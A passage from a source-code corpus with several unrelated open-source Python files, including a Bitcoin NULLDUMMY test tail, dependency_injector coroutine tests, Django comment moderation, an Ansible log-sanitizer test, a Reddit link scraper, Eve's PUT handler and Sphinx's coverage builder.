self.block_submit(self.nodes[0], [test2tx], True)
self.log.info("Test 4: Non-NULLDUMMY base multisig transaction is invalid after activation")
test4tx = self.create_transaction(self.nodes[0], txid4, self.address, 47)
test6txs=[CTransaction(test4tx)]
trueDummy(test4tx)
self.tx_submit(self.nodes[0], test4tx, NULLDUMMY_ERROR)
self.block_submit(self.nodes[0], [test4tx])
self.log.info("Test 6: NULLDUMMY compliant transactions should be accepted to mempool and in block after activation [432]")
for i in test6txs:
self.nodes[0].sendrawtransaction(bytes_to_hex_str(i.serialize_without_witness()), True)
self.block_submit(self.nodes[0], test6txs, True)
def create_transaction(self, node, txid, to_address, amount):
inputs = [{ "txid" : txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
tx = CTransaction()
f = BytesIO(hex_str_to_bytes(signresult['hex']))
tx.deserialize(f)
return tx
def tx_submit(self, node, tx, msg = ""):
tx.rehash()
try:
node.sendrawtransaction(bytes_to_hex_str(tx.serialize()), True)
except JSONRPCException as exp:
assert_equal(exp.error["message"], msg)
else:
assert_equal('', msg)
return tx.hash
def block_submit(self, node, txs, accept = False):
block = create_block(self.tip, create_coinbase(self.lastblockheight + 1), self.lastblocktime + 1)
block.nVersion = 4
for tx in txs:
tx.rehash()
block.vtx.append(tx)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
node.submitblock(bytes_to_hex_str(block.serialize()))
if (accept):
assert_equal(node.getbestblockhash(), block.hash)
self.tip = block.sha256
self.lastblockhash = block.hash
self.lastblocktime += 1
self.lastblockheight += 1
else:
assert_equal(node.getbestblockhash(), self.lastblockhash)
if __name__ == '__main__':
NULLDUMMYTest().main()
| mit |
rmk135/objects | tests/unit/providers/test_coroutines_py35.py | 1 | 10067 | """Dependency injector coroutine providers unit tests."""
import asyncio
import unittest2 as unittest
from dependency_injector import (
providers,
errors,
)
# Runtime import to get asyncutils module
import os
_TOP_DIR = os.path.abspath(
os.path.sep.join((
os.path.dirname(__file__),
'../',
)),
)
import sys
sys.path.append(_TOP_DIR)
from asyncutils import AsyncTestCase
async def _example(arg1, arg2, arg3, arg4):
future = asyncio.Future()
future.set_result(None)
await future
return arg1, arg2, arg3, arg4
def run(main):
loop = asyncio.get_event_loop()
return loop.run_until_complete(main)
class CoroutineTests(AsyncTestCase):
def test_init_with_coroutine(self):
self.assertTrue(providers.Coroutine(_example))
def test_init_with_not_coroutine(self):
self.assertRaises(errors.Error, providers.Coroutine, lambda: None)
def test_call_with_positional_args(self):
provider = providers.Coroutine(_example, 1, 2, 3, 4)
self.assertTupleEqual(self._run(provider()), (1, 2, 3, 4))
def test_call_with_keyword_args(self):
provider = providers.Coroutine(_example,
arg1=1, arg2=2, arg3=3, arg4=4)
self.assertTupleEqual(self._run(provider()), (1, 2, 3, 4))
def test_call_with_positional_and_keyword_args(self):
provider = providers.Coroutine(_example,
1, 2,
arg3=3, arg4=4)
self.assertTupleEqual(run(provider()), (1, 2, 3, 4))
def test_call_with_context_args(self):
provider = providers.Coroutine(_example, 1, 2)
self.assertTupleEqual(self._run(provider(3, 4)), (1, 2, 3, 4))
def test_call_with_context_kwargs(self):
provider = providers.Coroutine(_example, arg1=1)
self.assertTupleEqual(
self._run(provider(arg2=2, arg3=3, arg4=4)),
(1, 2, 3, 4),
)
def test_call_with_context_args_and_kwargs(self):
provider = providers.Coroutine(_example, 1)
self.assertTupleEqual(
self._run(provider(2, arg3=3, arg4=4)),
(1, 2, 3, 4),
)
def test_fluent_interface(self):
provider = providers.Coroutine(_example) \
.add_args(1, 2) \
.add_kwargs(arg3=3, arg4=4)
self.assertTupleEqual(self._run(provider()), (1, 2, 3, 4))
def test_set_args(self):
provider = providers.Coroutine(_example) \
.add_args(1, 2) \
.set_args(3, 4)
self.assertEqual(provider.args, tuple([3, 4]))
def test_set_kwargs(self):
provider = providers.Coroutine(_example) \
.add_kwargs(init_arg3=3, init_arg4=4) \
.set_kwargs(init_arg3=4, init_arg4=5)
self.assertEqual(provider.kwargs, dict(init_arg3=4, init_arg4=5))
def test_clear_args(self):
provider = providers.Coroutine(_example) \
.add_args(1, 2) \
.clear_args()
self.assertEqual(provider.args, tuple())
def test_clear_kwargs(self):
provider = providers.Coroutine(_example) \
.add_kwargs(init_arg3=3, init_arg4=4) \
.clear_kwargs()
self.assertEqual(provider.kwargs, dict())
def test_call_overridden(self):
provider = providers.Coroutine(_example)
provider.override(providers.Object((4, 3, 2, 1)))
provider.override(providers.Object((1, 2, 3, 4)))
self.assertTupleEqual(provider(), (1, 2, 3, 4))
def test_deepcopy(self):
provider = providers.Coroutine(_example)
provider_copy = providers.deepcopy(provider)
self.assertIsNot(provider, provider_copy)
self.assertIs(provider.provides, provider_copy.provides)
self.assertIsInstance(provider, providers.Coroutine)
def test_deepcopy_from_memo(self):
provider = providers.Coroutine(_example)
provider_copy_memo = providers.Coroutine(_example)
provider_copy = providers.deepcopy(
provider, memo={id(provider): provider_copy_memo})
self.assertIs(provider_copy, provider_copy_memo)
def test_deepcopy_args(self):
provider = providers.Coroutine(_example)
dependent_provider1 = providers.Callable(list)
dependent_provider2 = providers.Callable(dict)
provider.add_args(dependent_provider1, dependent_provider2)
provider_copy = providers.deepcopy(provider)
dependent_provider_copy1 = provider_copy.args[0]
dependent_provider_copy2 = provider_copy.args[1]
self.assertNotEqual(provider.args, provider_copy.args)
self.assertIs(dependent_provider1.provides,
dependent_provider_copy1.provides)
self.assertIsNot(dependent_provider1, dependent_provider_copy1)
self.assertIs(dependent_provider2.provides,
dependent_provider_copy2.provides)
self.assertIsNot(dependent_provider2, dependent_provider_copy2)
def test_deepcopy_kwargs(self):
provider = providers.Coroutine(_example)
dependent_provider1 = providers.Callable(list)
dependent_provider2 = providers.Callable(dict)
provider.add_kwargs(a1=dependent_provider1, a2=dependent_provider2)
provider_copy = providers.deepcopy(provider)
dependent_provider_copy1 = provider_copy.kwargs['a1']
dependent_provider_copy2 = provider_copy.kwargs['a2']
self.assertNotEqual(provider.kwargs, provider_copy.kwargs)
self.assertIs(dependent_provider1.provides,
dependent_provider_copy1.provides)
self.assertIsNot(dependent_provider1, dependent_provider_copy1)
self.assertIs(dependent_provider2.provides,
dependent_provider_copy2.provides)
self.assertIsNot(dependent_provider2, dependent_provider_copy2)
def test_deepcopy_overridden(self):
provider = providers.Coroutine(_example)
object_provider = providers.Object(object())
provider.override(object_provider)
provider_copy = providers.deepcopy(provider)
object_provider_copy = provider_copy.overridden[0]
self.assertIsNot(provider, provider_copy)
self.assertIs(provider.provides, provider_copy.provides)
self.assertIsInstance(provider, providers.Callable)
self.assertIsNot(object_provider, object_provider_copy)
self.assertIsInstance(object_provider_copy, providers.Object)
def test_repr(self):
provider = providers.Coroutine(_example)
self.assertEqual(repr(provider),
'<dependency_injector.providers.'
'Coroutine({0}) at {1}>'.format(
repr(_example),
hex(id(provider))))
class DelegatedCoroutineTests(unittest.TestCase):
def test_inheritance(self):
self.assertIsInstance(providers.DelegatedCoroutine(_example),
providers.Coroutine)
def test_is_provider(self):
self.assertTrue(
providers.is_provider(providers.DelegatedCoroutine(_example)))
def test_is_delegated_provider(self):
provider = providers.DelegatedCoroutine(_example)
self.assertTrue(providers.is_delegated(provider))
def test_repr(self):
provider = providers.DelegatedCoroutine(_example)
self.assertEqual(repr(provider),
'<dependency_injector.providers.'
'DelegatedCoroutine({0}) at {1}>'.format(
repr(_example),
hex(id(provider))))
class AbstractCoroutineTests(AsyncTestCase):
def test_inheritance(self):
self.assertIsInstance(providers.AbstractCoroutine(_example),
providers.Coroutine)
def test_call_overridden_by_coroutine(self):
@asyncio.coroutine
def _abstract_example():
raise RuntimeError('Should not be raised')
provider = providers.AbstractCoroutine(_abstract_example)
provider.override(providers.Coroutine(_example))
self.assertTrue(self._run(provider(1, 2, 3, 4)), (1, 2, 3, 4))
def test_call_overridden_by_delegated_coroutine(self):
@asyncio.coroutine
def _abstract_example():
raise RuntimeError('Should not be raised')
provider = providers.AbstractCoroutine(_abstract_example)
provider.override(providers.DelegatedCoroutine(_example))
self.assertTrue(self._run(provider(1, 2, 3, 4)), (1, 2, 3, 4))
def test_call_not_overridden(self):
provider = providers.AbstractCoroutine(_example)
with self.assertRaises(errors.Error):
provider(1, 2, 3, 4)
def test_override_by_not_coroutine(self):
provider = providers.AbstractCoroutine(_example)
with self.assertRaises(errors.Error):
provider.override(providers.Factory(object))
def test_provide_not_implemented(self):
provider = providers.AbstractCoroutine(_example)
with self.assertRaises(NotImplementedError):
provider._provide((1, 2, 3, 4), dict())
def test_repr(self):
provider = providers.AbstractCoroutine(_example)
self.assertEqual(repr(provider),
'<dependency_injector.providers.'
'AbstractCoroutine({0}) at {1}>'.format(
repr(_example),
hex(id(provider))))
class CoroutineDelegateTests(unittest.TestCase):
def setUp(self):
self.delegated = providers.Coroutine(_example)
self.delegate = providers.CoroutineDelegate(self.delegated)
def test_is_delegate(self):
self.assertIsInstance(self.delegate, providers.Delegate)
def test_init_with_not_callable(self):
self.assertRaises(errors.Error,
providers.CoroutineDelegate,
providers.Object(object()))
| bsd-3-clause |
sanjeevtripurari/hue | desktop/core/ext-py/Django-1.6.10/django/contrib/comments/moderation.py | 121 | 13553 | """
A generic comment-moderation system which allows configuration of
moderation options on a per-model basis.
To use, do two things:
1. Create or import a subclass of ``CommentModerator`` defining the
options you want.
2. Import ``moderator`` from this module and register one or more
models, passing the models and the ``CommentModerator`` options
class you want to use.
Example
-------
First, we define a simple model class which might represent entries in
a Weblog::
from django.db import models
class Entry(models.Model):
title = models.CharField(maxlength=250)
body = models.TextField()
pub_date = models.DateField()
enable_comments = models.BooleanField()
Then we create a ``CommentModerator`` subclass specifying some
moderation options::
from django.contrib.comments.moderation import CommentModerator, moderator
class EntryModerator(CommentModerator):
email_notification = True
enable_field = 'enable_comments'
And finally register it for moderation::
moderator.register(Entry, EntryModerator)
This sample class would apply two moderation steps to each new
comment submitted on an Entry:
* If the entry's ``enable_comments`` field is set to ``False``, the
comment will be rejected (immediately deleted).
* If the comment is successfully posted, an email notification of the
comment will be sent to site staff.
For a full list of built-in moderation options and other
configurability, see the documentation for the ``CommentModerator``
class.
"""
import datetime
from django.conf import settings
from django.core.mail import send_mail
from django.contrib.comments import signals
from django.db.models.base import ModelBase
from django.template import Context, loader
from django.contrib import comments
from django.contrib.sites.models import get_current_site
from django.utils import timezone
class AlreadyModerated(Exception):
"""
Raised when a model which is already registered for moderation is
attempting to be registered again.
"""
pass
class NotModerated(Exception):
"""
Raised when a model which is not registered for moderation is
attempting to be unregistered.
"""
pass
class CommentModerator(object):
"""
Encapsulates comment-moderation options for a given model.
This class is not designed to be used directly, since it doesn't
enable any of the available moderation options. Instead, subclass
it and override attributes to enable different options::
``auto_close_field``
If this is set to the name of a ``DateField`` or
``DateTimeField`` on the model for which comments are
being moderated, new comments for objects of that model
will be disallowed (immediately deleted) when a certain
number of days have passed after the date specified in
that field. Must be used in conjunction with
``close_after``, which specifies the number of days past
which comments should be disallowed. Default value is
``None``.
``auto_moderate_field``
Like ``auto_close_field``, but instead of outright
deleting new comments when the requisite number of days
have elapsed, it will simply set the ``is_public`` field
of new comments to ``False`` before saving them. Must be
used in conjunction with ``moderate_after``, which
specifies the number of days past which comments should be
moderated. Default value is ``None``.
``close_after``
If ``auto_close_field`` is used, this must specify the
number of days past the value of the field specified by
``auto_close_field`` after which new comments for an
object should be disallowed. Default value is ``None``.
``email_notification``
If ``True``, any new comment on an object of this model
which survives moderation will generate an email to site
staff. Default value is ``False``.
``enable_field``
If this is set to the name of a ``BooleanField`` on the
model for which comments are being moderated, new comments
on objects of that model will be disallowed (immediately
deleted) whenever the value of that field is ``False`` on
the object the comment would be attached to. Default value
is ``None``.
``moderate_after``
If ``auto_moderate_field`` is used, this must specify the number
of days past the value of the field specified by
``auto_moderate_field`` after which new comments for an
object should be marked non-public. Default value is
``None``.
Most common moderation needs can be covered by changing these
attributes, but further customization can be obtained by
subclassing and overriding the following methods. Each method will
be called with three arguments: ``comment``, which is the comment
being submitted, ``content_object``, which is the object the
comment will be attached to, and ``request``, which is the
``HttpRequest`` in which the comment is being submitted::
``allow``
Should return ``True`` if the comment should be allowed to
post on the content object, and ``False`` otherwise (in
which case the comment will be immediately deleted).
``email``
If email notification of the new comment should be sent to
site staff or moderators, this method is responsible for
sending the email.
``moderate``
Should return ``True`` if the comment should be moderated
(in which case its ``is_public`` field will be set to
``False`` before saving), and ``False`` otherwise (in
which case the ``is_public`` field will not be changed).
Subclasses which want to introspect the model for which comments
are being moderated can do so through the attribute ``_model``,
which will be the model class.
"""
auto_close_field = None
auto_moderate_field = None
close_after = None
email_notification = False
enable_field = None
moderate_after = None
def __init__(self, model):
self._model = model
def _get_delta(self, now, then):
"""
Internal helper which will return a ``datetime.timedelta``
representing the time between ``now`` and ``then``. Assumes
``now`` is a ``datetime.date`` or ``datetime.datetime`` later
than ``then``.
If ``now`` and ``then`` are not of the same type due to one of
them being a ``datetime.date`` and the other being a
``datetime.datetime``, both will be coerced to
``datetime.date`` before calculating the delta.
"""
if now.__class__ is not then.__class__:
now = datetime.date(now.year, now.month, now.day)
then = datetime.date(then.year, then.month, then.day)
if now < then:
raise ValueError("Cannot determine moderation rules because date field is set to a value in the future")
return now - then
def allow(self, comment, content_object, request):
"""
Determine whether a given comment is allowed to be posted on
a given object.
Return ``True`` if the comment should be allowed, ``False
otherwise.
"""
if self.enable_field:
if not getattr(content_object, self.enable_field):
return False
if self.auto_close_field and self.close_after is not None:
close_after_date = getattr(content_object, self.auto_close_field)
if close_after_date is not None and self._get_delta(timezone.now(), close_after_date).days >= self.close_after:
return False
return True
def moderate(self, comment, content_object, request):
"""
Determine whether a given comment on a given object should be
allowed to show up immediately, or should be marked non-public
and await approval.
Return ``True`` if the comment should be moderated (marked
non-public), ``False`` otherwise.
"""
if self.auto_moderate_field and self.moderate_after is not None:
moderate_after_date = getattr(content_object, self.auto_moderate_field)
if moderate_after_date is not None and self._get_delta(timezone.now(), moderate_after_date).days >= self.moderate_after:
return True
return False
def email(self, comment, content_object, request):
"""
Send email notification of a new comment to site staff when email
notifications have been requested.
"""
if not self.email_notification:
return
recipient_list = [manager_tuple[1] for manager_tuple in settings.MANAGERS]
t = loader.get_template('comments/comment_notification_email.txt')
c = Context({ 'comment': comment,
'content_object': content_object })
subject = '[%s] New comment posted on "%s"' % (get_current_site(request).name,
content_object)
message = t.render(c)
send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, recipient_list, fail_silently=True)
class Moderator(object):
"""
Handles moderation of a set of models.
An instance of this class will maintain a list of one or more
models registered for comment moderation, and their associated
moderation classes, and apply moderation to all incoming comments.
To register a model, obtain an instance of ``Moderator`` (this
module exports one as ``moderator``), and call its ``register``
method, passing the model class and a moderation class (which
should be a subclass of ``CommentModerator``). Note that both of
these should be the actual classes, not instances of the classes.
To cease moderation for a model, call the ``unregister`` method,
passing the model class.
For convenience, both ``register`` and ``unregister`` can also
accept a list of model classes in place of a single model; this
allows easier registration of multiple models with the same
``CommentModerator`` class.
The actual moderation is applied in two phases: one prior to
saving a new comment, and the other immediately after saving. The
pre-save moderation may mark a comment as non-public or mark it to
be removed; the post-save moderation may delete a comment which
was disallowed (there is currently no way to prevent the comment
being saved once before removal) and, if the comment is still
around, will send any notification emails the comment generated.
"""
def __init__(self):
self._registry = {}
self.connect()
def connect(self):
"""
Hook up the moderation methods to pre- and post-save signals
from the comment models.
"""
signals.comment_will_be_posted.connect(self.pre_save_moderation, sender=comments.get_model())
signals.comment_was_posted.connect(self.post_save_moderation, sender=comments.get_model())
def register(self, model_or_iterable, moderation_class):
"""
Register a model or a list of models for comment moderation,
using a particular moderation class.
Raise ``AlreadyModerated`` if any of the models are already
registered.
"""
if isinstance(model_or_iterable, ModelBase):
model_or_iterable = [model_or_iterable]
for model in model_or_iterable:
if model in self._registry:
raise AlreadyModerated("The model '%s' is already being moderated" % model._meta.model_name)
self._registry[model] = moderation_class(model)
def unregister(self, model_or_iterable):
"""
Remove a model or a list of models from the list of models
whose comments will be moderated.
Raise ``NotModerated`` if any of the models are not currently
registered for moderation.
"""
if isinstance(model_or_iterable, ModelBase):
model_or_iterable = [model_or_iterable]
for model in model_or_iterable:
if model not in self._registry:
raise NotModerated("The model '%s' is not currently being moderated" % model._meta.model_name)
del self._registry[model]
def pre_save_moderation(self, sender, comment, request, **kwargs):
"""
Apply any necessary pre-save moderation steps to new
comments.
"""
model = comment.content_type.model_class()
if model not in self._registry:
return
content_object = comment.content_object
moderation_class = self._registry[model]
# Comment will be disallowed outright (HTTP 403 response)
if not moderation_class.allow(comment, content_object, request):
return False
if moderation_class.moderate(comment, content_object, request):
comment.is_public = False
def post_save_moderation(self, sender, comment, request, **kwargs):
"""
Apply any necessary post-save moderation steps to new
comments.
"""
model = comment.content_type.model_class()
if model not in self._registry:
return
self._registry[model].email(comment, comment.content_object, request)
# Import this instance in your own code to use in registering
# your models for moderation.
moderator = Moderator()
| apache-2.0 |
soarpenguin/ansible | test/units/module_utils/basic/test_heuristic_log_sanitize.py | 66 | 3816 | # -*- coding: utf-8 -*-
# (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division)
__metaclass__ = type
import sys
import syslog
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch, MagicMock
from ansible.module_utils.basic import heuristic_log_sanitize
class TestHeuristicLogSanitize(unittest.TestCase):
def setUp(self):
self.URL_SECRET = 'http://username:pas:word@foo.com/data'
self.SSH_SECRET = 'username:pas:word@foo.com/data'
self.clean_data = repr(self._gen_data(3, True, True, 'no_secret_here'))
self.url_data = repr(self._gen_data(3, True, True, self.URL_SECRET))
self.ssh_data = repr(self._gen_data(3, True, True, self.SSH_SECRET))
def _gen_data(self, records, per_rec, top_level, secret_text):
hostvars = {'hostvars': {}}
for i in range(1, records, 1):
host_facts = {
'host%s' % i: {
'pstack': {
'running': '875.1',
'symlinked': '880.0',
'tars': [],
'versions': ['885.0']
},
}
}
if per_rec:
host_facts['host%s' % i]['secret'] = secret_text
hostvars['hostvars'].update(host_facts)
if top_level:
hostvars['secret'] = secret_text
return hostvars
def test_did_not_hide_too_much(self):
self.assertEquals(heuristic_log_sanitize(self.clean_data), self.clean_data)
def test_hides_url_secrets(self):
url_output = heuristic_log_sanitize(self.url_data)
# Basic functionality: Successfully hid the password
self.assertNotIn('pas:word', url_output)
# Slightly more advanced, we hid all of the password despite the ":"
self.assertNotIn('pas', url_output)
# In this implementation we replace the password with 8 "*" which is
# also the length of our password. The url fields should be able to
# accurately detect where the password ends so the length should be
# the same:
self.assertEqual(len(url_output), len(self.url_data))
def test_hides_ssh_secrets(self):
ssh_output = heuristic_log_sanitize(self.ssh_data)
self.assertNotIn('pas:word', ssh_output)
# Slightly more advanced, we hid all of the password despite the ":"
self.assertNotIn('pas', ssh_output)
# ssh checking is harder as the heuristic is overzealous in many
# cases. Since the input will have at least one ":" present before
# the password we can tell some things about the beginning and end of
# the data, though:
self.assertTrue(ssh_output.startswith("{'"))
self.assertTrue(ssh_output.endswith("}"))
self.assertIn(":********@foo.com/data'", ssh_output)
def test_hides_parameter_secrets(self):
output = heuristic_log_sanitize('token="secret", user="person", token_entry="test=secret"', frozenset(['secret']))
self.assertNotIn('secret', output)
| gpl-3.0 |
jlblatt/Hollowbot | links.py | 1 | 3835 | import datetime
import json
import time
from conf import _
from init import db, cur, opener
import log
import lib
import stats
lcount = 0
def get(url):
log.write("Getting %d page(s) of %d links from: %s..." % (_['page_limit'], _['links_per_page'], url), 'message')
start = time.time()
after = ''
for p in range(_['page_limit']):
if after is None: break
if after != '': finalUrl = url + '&after=' + after
else: finalUrl = url
try:
success = False
for i in range(_['http_retries']):
f = opener.open(finalUrl)
if f.getcode() == 200:
success = True
break
else:
log.write('Error %d for links url: %s' % (f.getcode(), finalUrl), 'error')
if f.getcode() in [401, 403, 404]:
return
time.sleep(_['sleep'])
if success == False:
log.write('Retries exhausted for links url: %s' % finalUrl, 'error');
return
time.sleep(_['sleep'])
except Exception, e:
log.write('Error opening links url: %s - %s' % (finalUrl, e), 'error')
return
rJSON = f.read()
f.close()
try: links = json.loads(rJSON)
except Exception, e:
log.write('Error parsing links url: %s - %s' % (finalUrl, e), 'error')
return
after = links['data']['after']
for l in links['data']['children']:
try:
if l['kind'] == 't3':
try:
cur.execute("select id from t3 where id = %s", (lib.base36decode(l['data']['id']),))
if cur.rowcount > 0:
cur.execute("update t3 set last_seen = now() where id = %s", (lib.base36decode(l['data']['id']),))
else:
if l['data']['is_self']: content = l['data']['selftext']
else: content = None;
cur.execute("""insert into t3 (
id,
title,
url,
permalink,
content,
author,
created,
last_seen,
last_crawled
) values (%s, %s, %s, %s, %s, %s, %s, now(), 0)""", (
lib.base36decode(l['data']['id']),
l['data']['title'],
l['data']['url'],
l['data']['permalink'],
content,
l['data']['author'],
datetime.datetime.fromtimestamp(l['data']['created_utc'])
))
db.commit()
except Exception, e:
log.write('Error storing t3_' + l['data']['id'] + ': %s' % e, 'error')
db.rollback()
except Exception, e:
log.write('Error checking links file node type: %s' % e, 'error')
#endfor l in links
stats.linkTimes['counts'].append(len(links['data']['children']))
stats.linkTimes['times'].append(time.time() - start)
time.sleep(_['sleep'])
#endfor p in pages
| gpl-3.0 |
amagdas/eve | eve/methods/put.py | 2 | 8754 | # -*- coding: utf-8 -*-
"""
eve.methods.put
~~~~~~~~~~~~~~~
This module imlements the PUT method.
:copyright: (c) 2015 by Nicola Iarocci.
:license: BSD, see LICENSE for more details.
"""
from werkzeug import exceptions
from datetime import datetime
from eve.auth import requires_auth
from eve.defaults import resolve_default_values
from eve.validation import ValidationError
from flask import current_app as app, abort
from eve.utils import config, debug_error_message, parse_request
from eve.methods.common import get_document, parse, payload as payload_, \
ratelimit, pre_event, store_media_files, resolve_user_restricted_access, \
resolve_embedded_fields, build_response_document, marshal_write_response, \
resolve_document_etag, oplog_push
from eve.versioning import resolve_document_version, \
insert_versioning_documents, late_versioning_catch
@ratelimit()
@requires_auth('item')
@pre_event
def put(resource, payload=None, **lookup):
"""
Default function for handling PUT requests, it has decorators for
rate limiting, authentication and for raising pre-request events.
After the decorators are applied forwards to call to :func:`put_internal`
.. versionchanged:: 0.5
Split into put() and put_internal().
"""
return put_internal(resource, payload, concurrency_check=True,
skip_validation=False, **lookup)
def put_internal(resource, payload=None, concurrency_check=False,
skip_validation=False, **lookup):
""" Intended for internal put calls, this method is not rate limited,
authentication is not checked, pre-request events are not raised, and
concurrency checking is optional. Performs a document replacement.
Updates are first validated against the resource schema. If validation
passes, the document is repalced and an OK status update is returned.
If validation fails a set of validation issues is returned.
:param resource: the name of the resource to which the document belongs.
:param payload: alternative payload. When calling put() from your own code
you can provide an alternative payload. This can be useful,
for example, when you have a callback function hooked to a
certain endpoint, and want to perform additional put()
callsfrom there.
Please be advised that in order to successfully use this
option, a request context must be available.
:param concurrency_check: concurrency check switch (bool)
:param skip_validation: skip payload validation before write (bool)
:param **lookup: document lookup query.
.. versionchanged:: 0.6
Allow restoring soft deleted documents via PUT
.. versionchanged:: 0.5
Back to resolving default values after validaton as now the validator
can properly validate dependency even when some have default values. See
#353.
Original put() has been split into put() and put_internal().
You can now pass a pre-defined custom payload to the funcion.
ETAG is now stored with the document (#369).
Catching all HTTPExceptions and returning them to the caller, allowing
for eventual flask.abort() invocations in callback functions to go
through. Fixes #395.
.. versionchanged:: 0.4
Allow abort() to be inoked by callback functions.
Resolve default values before validation is performed. See #353.
Raise 'on_replace' instead of 'on_insert'. The callback function gets
the document (as opposed to a list of just 1 document) as an argument.
Support for document versioning.
Raise `on_replaced` after the document has been replaced
.. versionchanged:: 0.3
Support for media fields.
When IF_MATCH is disabled, no etag is included in the payload.
Support for new validation format introduced with Cerberus v0.5.
.. versionchanged:: 0.2
Use the new STATUS setting.
Use the new ISSUES setting.
Raise pre_<method> event.
explictly resolve default values instead of letting them be resolved
by common.parse. This avoids a validation error when a read-only field
also has a default value.
.. versionchanged:: 0.1.1
auth.request_auth_value is now used to store the auth_field value.
Item-identifier wrapper stripped from both request and response payload.
.. versionadded:: 0.1.0
"""
resource_def = app.config['DOMAIN'][resource]
schema = resource_def['schema']
if not skip_validation:
validator = app.validator(schema, resource)
if payload is None:
payload = payload_()
original = get_document(resource, concurrency_check, **lookup)
if not original:
# not found
abort(404)
last_modified = None
etag = None
issues = {}
object_id = original[config.ID_FIELD]
response = {}
if config.BANDWIDTH_SAVER is True:
embedded_fields = []
else:
req = parse_request(resource)
embedded_fields = resolve_embedded_fields(resource, req)
try:
document = parse(payload, resource)
if skip_validation:
validation = True
else:
validation = validator.validate_replace(document, object_id,
original)
if validation:
# sneak in a shadow copy if it wasn't already there
late_versioning_catch(original, resource)
# update meta
last_modified = datetime.utcnow().replace(microsecond=0)
document[config.LAST_UPDATED] = last_modified
document[config.DATE_CREATED] = original[config.DATE_CREATED]
if resource_def['soft_delete'] is True:
# PUT with soft delete enabled should always set the DELETED
# field to False. We are either carrying through un-deleted
# status, or restoring a soft deleted document
document[config.DELETED] = False
# ID_FIELD not in document means it is not being automatically
# handled (it has been set to a field which exists in the
# resource schema.
if config.ID_FIELD not in document:
document[config.ID_FIELD] = object_id
resolve_user_restricted_access(document, resource)
resolve_default_values(document, resource_def['defaults'])
store_media_files(document, resource, original)
resolve_document_version(document, resource, 'PUT', original)
# notify callbacks
getattr(app, "on_replace")(resource, document, original)
getattr(app, "on_replace_%s" % resource)(document, original)
resolve_document_etag(document, resource)
# write to db
try:
app.data.replace(
resource, object_id, document, original)
except app.data.OriginalChangedError:
if concurrency_check:
abort(412, description=debug_error_message(
'Client and server etags don\'t match'
))
# update oplog if needed
oplog_push(resource, document, 'PUT')
insert_versioning_documents(resource, document)
# notify callbacks
getattr(app, "on_replaced")(resource, document, original)
getattr(app, "on_replaced_%s" % resource)(document, original)
# build the full response document
build_response_document(
document, resource, embedded_fields, document)
response = document
if config.IF_MATCH:
etag = response[config.ETAG]
else:
issues = validator.errors
except ValidationError as e:
# TODO should probably log the error and abort 400 instead (when we
# got logging)
issues['validator exception'] = str(e)
except exceptions.HTTPException as e:
raise e
except Exception as e:
# consider all other exceptions as Bad Requests
abort(400, description=debug_error_message(
'An exception occurred: %s' % e
))
if len(issues):
response[config.ISSUES] = issues
response[config.STATUS] = config.STATUS_ERR
status = config.VALIDATION_ERROR_STATUS
else:
response[config.STATUS] = config.STATUS_OK
status = 200
# limit what actually gets sent to minimize bandwidth usage
response = marshal_write_response(response, resource)
return response, last_modified, etag, status
| bsd-3-clause |
crakensio/django_training | lib/python2.7/site-packages/sphinx/ext/coverage.py | 11 | 9788 | # -*- coding: utf-8 -*-
"""
sphinx.ext.coverage
~~~~~~~~~~~~~~~~~~~
Check Python modules and C API for coverage. Mostly written by Josip
Dzolonga for the Google Highly Open Participation contest.
:copyright: Copyright 2007-2014 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
import glob
import inspect
import cPickle as pickle
from os import path
from sphinx.builders import Builder
# utility
def write_header(f, text, char='-'):
f.write(text + '\n')
f.write(char * len(text) + '\n')
def compile_regex_list(name, exps, warnfunc):
lst = []
for exp in exps:
try:
lst.append(re.compile(exp))
except Exception:
warnfunc('invalid regex %r in %s' % (exp, name))
return lst
class CoverageBuilder(Builder):
name = 'coverage'
def init(self):
self.c_sourcefiles = []
for pattern in self.config.coverage_c_path:
pattern = path.join(self.srcdir, pattern)
self.c_sourcefiles.extend(glob.glob(pattern))
self.c_regexes = []
for (name, exp) in self.config.coverage_c_regexes.items():
try:
self.c_regexes.append((name, re.compile(exp)))
except Exception:
self.warn('invalid regex %r in coverage_c_regexes' % exp)
self.c_ignorexps = {}
for (name, exps) in self.config.coverage_ignore_c_items.iteritems():
self.c_ignorexps[name] = compile_regex_list(
'coverage_ignore_c_items', exps, self.warn)
self.mod_ignorexps = compile_regex_list(
'coverage_ignore_modules', self.config.coverage_ignore_modules,
self.warn)
self.cls_ignorexps = compile_regex_list(
'coverage_ignore_classes', self.config.coverage_ignore_classes,
self.warn)
self.fun_ignorexps = compile_regex_list(
'coverage_ignore_functions', self.config.coverage_ignore_functions,
self.warn)
def get_outdated_docs(self):
return 'coverage overview'
def write(self, *ignored):
self.py_undoc = {}
self.build_py_coverage()
self.write_py_coverage()
self.c_undoc = {}
self.build_c_coverage()
self.write_c_coverage()
def build_c_coverage(self):
# Fetch all the info from the header files
c_objects = self.env.domaindata['c']['objects']
for filename in self.c_sourcefiles:
undoc = []
f = open(filename, 'r')
try:
for line in f:
for key, regex in self.c_regexes:
match = regex.match(line)
if match:
name = match.groups()[0]
if name not in c_objects:
for exp in self.c_ignorexps.get(key, ()):
if exp.match(name):
break
else:
undoc.append((key, name))
continue
finally:
f.close()
if undoc:
self.c_undoc[filename] = undoc
def write_c_coverage(self):
output_file = path.join(self.outdir, 'c.txt')
op = open(output_file, 'w')
try:
if self.config.coverage_write_headline:
write_header(op, 'Undocumented C API elements', '=')
op.write('\n')
for filename, undoc in self.c_undoc.iteritems():
write_header(op, filename)
for typ, name in undoc:
op.write(' * %-50s [%9s]\n' % (name, typ))
op.write('\n')
finally:
op.close()
